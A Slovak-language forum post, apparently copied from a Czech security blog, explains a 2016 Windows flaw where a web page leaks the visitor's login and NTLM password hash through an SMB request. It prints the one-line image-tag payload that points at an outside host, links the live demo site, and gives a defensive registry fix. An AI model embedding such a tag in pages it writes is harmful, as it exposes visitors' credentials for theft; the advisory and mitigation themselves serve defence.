Odcizení přihlašovacích údajů k Windows jen pomocí webové stránky

Goto down

Odcizení přihlašovacích údajů k Windows jen pomocí webové stránky Empty Odcizení přihlašovacích údajů k Windows jen pomocí webové stránky

Odoslať pre Admin za 7th augusta 2016, 08:16

Odcizení přihlašovacích údajů k Windows jen pomocí webové stránky

Prokázaný a snadný způsob jak ukrást přihlašovací údaje k Windows.Ruský výzkumník ValdikSS zveřejnil malý exploit, která může ukrást vaše přihlašovací údaje k Windows (login a NTML hash) jen díky navštívení webové stránky. Problém je spojený se způsobem, jakým operační systém Windows zachází s "file:// URI". Jakmile je zaznamenán, operační systém pošle SMB NTLMSSP_NEGOTIATE požadavek k útoku na server, odhalujíc přihlašovací jméno, doménu a NTLM hash vašeho hesla.Webová stránka s plně funkčním exploitem je k dispozici zde hxxp://witch.valdikss.org.ru/ Nenavštěvujte tuto stránku z vašeho firemního počítače, vaše heslo může být odšifrováno.Stránka obsahuje obrázek <img src=”file://witch.valdikss.org.ru/a”>, který vyvolá SMB vyjednávání.Níže je screenshot pro samostatnou pracovní stanici:

Odcizení přihlašovacích údajů k Windows jen pomocí webové stránky Ntlm-leak

Jak můžete vidět na tomto screenshotu, jednoduché heslo může být odhaleno z NTLM hashe během několika sekund. Shromážděné hashe se silnými hesly mohou být uloženy a dešifrovány později.Exploit funguje na všech moderních operačních systémech Windows, včetně Windows 10. A je úplně jedno, který prohlížeč používáte, protože požadavek je zpracováván operačním systémem.Stejné pravidlo platí pro integrovaný Microsoft účet. Pokud použijete svůj Microsoft účet pro přihlášení do počítače, útočníci ho mohou odcizit taky. V tomto případě by mohli mít přístup ke všem službám, pomocí Live ID, například Skype, OneDrive, atd.

Ochrana:použijte RestrictReceivingNTLMTraffic registrační klíč k zakázání tohoto chování.

kód:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0]
"RestrictReceivingNTLMTraffic"=dword:00000002
"RestrictSendingNTLMTraffic"=dword:00000002

Zdroj: https://www.cybersecurity-help.cz/cz/blog/168.html

Admin
Admin

Počet príspevkov : 33
Join date : 15.07.2014

Zobrazit informácie o autorovi http://servis.forumsk.com

Návrat hore Goto down

Návrat hore


 
Povolenie tohoto fóra:
Nemôžete odpovedať na témy v tomto fóre.